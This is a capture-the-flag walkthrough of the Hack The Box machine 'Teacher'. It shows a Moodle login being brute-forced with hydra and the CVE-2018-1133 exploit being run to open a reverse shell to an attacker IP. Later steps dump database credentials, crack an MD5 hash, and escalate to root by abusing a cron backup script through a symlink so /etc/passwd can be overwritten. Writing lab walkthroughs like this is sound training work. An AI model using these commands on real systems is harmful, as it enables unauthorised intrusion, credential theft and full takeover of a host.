Teacher
About
Teacher is a “medium” difficulty machine, which teaches techniques for identifying and exploiting logical flaws and vulnerabilities of outdated modules within popular CMS (in this instance Moodle), enumeration of sensitive information within the backend database and leverage misconfigurations on the operating system, which lead to a complete compromise of a system.
Enumeration
Running the script portscan.sh reveals a single attack vector, HTTP.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ sudo portscan.sh 10.129.75.102
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ cat PortScan\(10.129.75.102\)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Blackhat highschool
|_http-server-header: Apache/2.4.25 (Debian)
Exploitation
HTTP
Accessing the page gallery.html shows a list of photos but one of them seems to not be rendered.
Reading the page source of the page reveals that the unrendered image is probably 5.png.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ curl -s http://10.129.75.102/gallery.html | grep 'img src' | sed -e 's/^[[:space:]]*//' | sort -V | uniq
<li><a href="#"><img src="images/5.png" alt=""></a></li>
<li><a href="#"><img src="images/5.png" onerror="console.log('That\'s an F');" alt=""></a></li>
<li><a href="#"><img src="images/5_2.png" alt=""></a></li>
<li><a href="#"><img src="images/5_3.png" alt=""></a></li>
<li><a href="#"><img src="images/5_4.png" alt=""></a></li>
<li><a href="#"><img src="images/5_5.png" alt=""></a></li>
<li><a href="#"><img src="images/5_6.png" alt=""></a></li>
<li><a href="#"><img src="images/5_7.png" alt=""></a></li>
<li><a href="#"><img src="images/5_8.png" alt=""></a></li>
<li><a href="#"><img src="images/5_9.png" alt=""></a></li>
<li><a href="#"><img src="images/5_10.png" alt=""></a></li>
<li><a href="#"><img src="images/5_11.png" alt=""></a></li>
<li><a href="#"><img src="images/5_12.png" alt=""></a></li>
<li><a href="#"><img src="images/5_13.png" alt=""></a></li>
<li><a href="#"><img src="images/5_14.png" alt=""></a></li>
<li><a href="#"><img src="images/5_15.png" alt=""></a></li>
<li><a href="#"><img src="images/5_16.png" alt=""></a></li>
By checking the image 5.png, I’m able to find that the image is actually a text file containing a partial password Th4C00lTheacha for a user Giovanni.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ curl http://10.129.75.102/images/5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
In order to find a place to test the username and password, I’ll perform a directory enumeration. Running gobuster reveals a directory moodle which seems interesting.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ gobuster dir -u http://10.129.75.102 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -f -t 32
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.75.102
[+] Method: GET
[+] Threads: 32
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2024/01/08 20:07:00 Starting gobuster in directory enumeration mode
===============================================================
/images/ (Status: 200) [Size: 15198]
/icons/ (Status: 403) [Size: 278]
/phpmyadmin/ (Status: 403) [Size: 278]
/moodle/ (Status: 303) [Size: 423] [--> http://teacher.htb/moodle]
/manual/ (Status: 200) [Size: 626]
/css/ (Status: 200) [Size: 932]
/js/ (Status: 200) [Size: 1351]
===============================================================
2024/01/08 20:31:18 Finished
===============================================================
Since gobuster revealed a domain teacher.htb, I’ll add it to the file /etc/hosts for host resolution.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ diff /etc/hosts.bak /etc/hosts
10a11
> 10.129.75.102 teacher.htb
By accessing the redirection address http://teacher.htb/moodle, I’m able to find a Moodle site with a single course Algebra from the teacher Giovanni.
In order to login as Giovanni, I’ll need to find the last character of the password. By creating a password list using crunch and brute-forcing the login form with hydra, I’m able to find a credential giovanni:Th4C00lTheacha#.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ crunch 15 15 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -t Th4C00lTheacha@ -o passwords.txt
Crunch will now generate the following amount of data: 1520 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 95
crunch: 100% completed generating output
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ hydra -l giovanni -P passwords.txt teacher.htb http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:F=Invalid login, please try again" -F
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-08 20:46:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking http-post-form://teacher.htb:80/moodle/login/index.php:username=^USER^&password=^PASS^:F=Invalid login, please try again
[80][http-post-form] host: teacher.htb login: giovanni password: Th4C00lTheacha#
[STATUS] attack finished for teacher.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-08 20:47:13
Now that I have the ability to login as giovanni, I’ll need to find a way to gain RCE from Moodle using the teacher account.
Running searchsploit-prettify.py reveals vast number of exploits. After going through the list, I’ll start by testing the exploit Moodle 3.4.1 - Remote Code Execution as it seems to provide RCE to a user with a teacher role.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ searchsploit-prettify.py Moodle
--------------------------------------------------------------------------- -----------------------------------------------------
| Exploit Title | Path |
--------------------------------------------------------------------------- -----------------------------------------------------
| Mambo Component Mam-Moodle alpha - Remote File Inclusion | /usr/share/exploitdb/exploits/php/webapps/2064.txt |
| Moodle - Remote Command Execution (Metasploit) | /usr/share/exploitdb/exploits/linux/remote/29324.rb |
| Moodle 1.1/1.2 - Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/24071.txt |
| Moodle 1.5.2 - 'moodledata' Remote Session Disclosure | /usr/share/exploitdb/exploits/php/webapps/3508.txt |
| Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/29284.txt |
| Moodle 1.6dev - SQL Injection / Command Execution | /usr/share/exploitdb/exploits/php/webapps/1312.php |
| Moodle 1.7.1 - 'index.php' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/30261.txt |
| Moodle 1.8.3 - 'install.php' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/31020.txt |
| Moodle 1.8.4 - Remote Code Execution | /usr/share/exploitdb/exploits/php/webapps/6356.php |
| Moodle 1.9.3 - Remote Code Execution | /usr/share/exploitdb/exploits/php/webapps/7437.txt |
| Moodle 1.x - 'post.php' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/24356.txt |
| Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/35297.txt |
| Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities | /usr/share/exploitdb/exploits/php/webapps/28174.txt |
| Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/36418.txt |
| Moodle 2.7 - Persistent Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/34169.txt |
| Moodle 2.x/3.x - SQL Injection | /usr/share/exploitdb/exploits/php/webapps/41828.php |
| Moodle 3.10.3 - 'label' Persistent Cross Site Scripting | /usr/share/exploitdb/exploits/php/webapps/49714.txt |
| Moodle 3.10.3 - 'url' Persistent Cross Site Scripting | /usr/share/exploitdb/exploits/php/webapps/49797.txt |
| Moodle 3.11.4 - SQL Injection | /usr/share/exploitdb/exploits/php/webapps/50700.txt |
| Moodle 3.11.5 - SQLi (Authenticated) | /usr/share/exploitdb/exploits/php/webapps/50825.py |
| Moodle 3.4.1 - Remote Code Execution | /usr/share/exploitdb/exploits/php/webapps/46551.php |
| Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) | /usr/share/exploitdb/exploits/php/webapps/49814.txt |
| Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit) | /usr/share/exploitdb/exploits/php/remote/46775.rb |
| Moodle 3.8 - Unrestricted File Upload | /usr/share/exploitdb/exploits/php/webapps/49114.txt |
| Moodle 3.9 - Remote Code Execution (RCE) (Authenticated) | /usr/share/exploitdb/exploits/php/webapps/50180.py |
| Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure | /usr/share/exploitdb/exploits/php/webapps/8297.txt |
| Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection | /usr/share/exploitdb/exploits/php/webapps/28770.txt |
| Moodle Filepicker 3.5.2 - Server Side Request Forgery | /usr/share/exploitdb/exploits/php/webapps/47177.txt |
| Moodle Help Script 1.x - Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/24279.txt |
| Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/46881.txt |
| Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/46881.txt |
| Moodle LMS 4.0 - Cross-Site Scripting (XSS) | /usr/share/exploitdb/exploits/php/webapps/51115.txt |
--------------------------------------------------------------------------- -----------------------------------------------------
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ searchsploit -m /usr/share/exploitdb/exploits/php/webapps/46551.php
Exploit: Moodle 3.4.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/46551
Path: /usr/share/exploitdb/exploits/php/webapps/46551.php
Codes: CVE-2018-1133
Verified: False
File Type: C++ source, ASCII text
Copied to: /home/m0nk3y/HTB/Teacher/46551.php
Reading the exploit shows that it requires username password and a valid course ID belonging to a teacher. From the page source, I’m able to find that the course ID of Algebra is 2.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ curl -s http://teacher.htb/moodle/ | grep Algebra | xargs
<div role=main><span id=maincontent></span><a class=skip skip-block href=#skipavailablecourses>Skip available courses</a><div id=frontpage-course-list><h2>Available courses</h2><div class=courses frontpage-course-list-all><div class=coursebox clearfix odd first last data-courseid=2 data-type=1><div class=info><h3 class=coursename><a class= href=http://teacher.htb/moodle/course/view.php?id=2>Algebra</a></h3><div class=moreinfo></div></div><div class=content><ul class=teachers><li>Teacher: <a href=http://teacher.htb/moodle/user/view.php?id=3&course=1>Giovanni Chhatta</a></li></ul></div></div></div></div><span class=skip-block-to id=skipavailablecourses></span><br /></div>
Finally, by executing the exploit with appropriate parameters, I’m able to gain a shell as the user www-data.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ php 46551.php url=http://teacher.htb/moodle user=giovanni pass=Th4C00lTheacha# ip=10.10.14.139 port=4444 course=2
*------------------------------*
* Noodle [Moodle RCE] (v3.4.1) *
*------------------------------*
[!] Make sure you have a listener
[!] at 10.10.14.139:4444
[*] Logging in as user giovanni with password Th4C00lTheacha#
[+] Successful Login
[>] Moodle Session te84mjjrgv654i3ra8trmoj3m5
[>] Moodle Key buL482m1y3
[*] Loading Course ID 2
[+] Successfully Loaded Course
[*] Enable Editing
[+] Successfully Enabled Course Editing
[*] Adding Quiz
[+] Successfully Added Quiz
[*] Configuring New Quiz
[+] Successfully Configured Quiz
[*] Loading Edit Quiz Page
[+] Successfully Loaded Edit Quiz Page
[*] Adding Calculated Question
[+] Successfully Added Calculation Question
[*] Adding Evil Question
[+] Successfully Created Evil Question
[*] Sending Exploit
[>] You should receive a reverse shell attempt from the target at 10.10.14.139 on port 4444
[>] If connection was successful this program will wait here until you close the connection.
[>] You should be able to Ctrl+C and retain the connection through netcat.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ nc -s 10.10.14.139 -nlvp 4444
listening on [10.10.14.139] 4444 ...
connect to [10.10.14.139] from (UNKNOWN) [10.129.75.102] 54862
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Lateral Movement
After a bit of enumeration, I’m able to find a file config.php which contains a credential root:Welkom1! for MySQL.
$ cat /var/www/html/moodle/config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://teacher.htb/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
By spawning a TTY shell and using the credential found, I’m able to login to MySQL as root. Inside the database moodle, there is a table mdl_user which contains a password hash 7a860966115182402ed06375cf0a22af for a newly found user Giovannibak which seems to be hashed with a different algorithm than the other hashes.
$ python -c 'import pty; pty.spawn("/bin/bash");'
www-data@teacher:/var/www/html/moodle/question$ mysql -uroot -pWelkom1! -Dmoodle
<l/moodle/question$ mysql -uroot -pWelkom1! -Dmoodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 496
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [moodle]> select username, password from mdl_user;
select username, password from mdl_user;
+-------------+--------------------------------------------------------------+
| username | password |
+-------------+--------------------------------------------------------------+
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)
Next, with john, I’m able to crack the password hash to find the password expelled for the user giovanni.
┌──(m0nk3y@kali)-[~/HTB/Teacher]
└─$ john hashes.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
expelled (?)
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
Finally, by switching the user to giovanni with the credential retrieved, I’m able to gain a shell as the user giovanni.
www-data@teacher:/var/www/html/moodle/question$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle/question$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)
Privilege Escalation
After a bit more enumeration, I’m able to find a file backup.sh which seems to be a custom script used in course backup. Furthermore, the change in the file backup_courses.tar.gz reveals that the script is run as root every minute.
giovanni@teacher:/var/www/html/moodle/question$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
Now that I know what kind of commands are run as root, I’ll check if I’m allowed to make a symbolic link of the file /etc/passwd in /home/giovanni/work/tmp. Unfortunately, this resulted in a failure as chmod does not change permissions of the pointed-to file during recursive directory traversals according to chmod(1) - Linux man page.
As the initial attempt resulted in a failure, we need to look for an alternative exploit for the script. As the script performs cd tmp and then changes the permissions of all files within the directory, I’ll be able to replace the directory with /etc and make the script turn /etc/passwd world-writable. To do so, I’ll erase the directory /home/giovanni/work/tmp and make a new symbolic link of /etc as /home/giovanni/work/tmp.
giovanni@teacher:/var/www/html/moodle/question$ rm -rf /home/giovanni/work/tmp
<tml/moodle/question$ rm -rf /home/giovanni/work/tmp
giovanni@teacher:/var/www/html/moodle/question$ ln -s /etc /home/giovanni/work/tmp
<moodle/question$ ln -s /etc /home/giovanni/work/tmp
After some waiting, we can find that the permissions on /etc/passwd has changed. As the file /etc/passwd is now world-writable, I’ll update the password for the user root to pwn.
giovanni@teacher:/var/www/html/moodle/question$ ls -al /etc/passwd
ls -al /etc/passwd
-rwxrwxrwx 1 root root 1450 Jun 27 2018 /etc/passwd
giovanni@teacher:/var/www/html/moodle/question$ ex "+set nobackup nowritebackup" "+%s/^root:[^:]\+:/root:$(openssl passwd -salt root -1 pwn):/" -scwq /etc/passwd
<nssl passwd -salt root -1 pwn):/" -scwq /etc/passwd
Finally, by switching to the super user with the updated password, I’m able to gain a shell as the user root.
giovanni@teacher:/var/www/html/moodle/question$ su
su
Password: pwn
root@teacher:/var/www/html/moodle/question# id
id
uid=0(root) gid=0(root) groups=0(root)
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
root@teacher:/var/www/html/moodle/question# cat /home/giovanni/user.txt
cat /home/giovanni/user.txt
723d8e72b16f82e0c64014277bade87e
root@teacher:/var/www/html/moodle/question# cat /root/root.txt
cat /root/root.txt
0e2aad7a89e93920e83a0a4e1d82e71c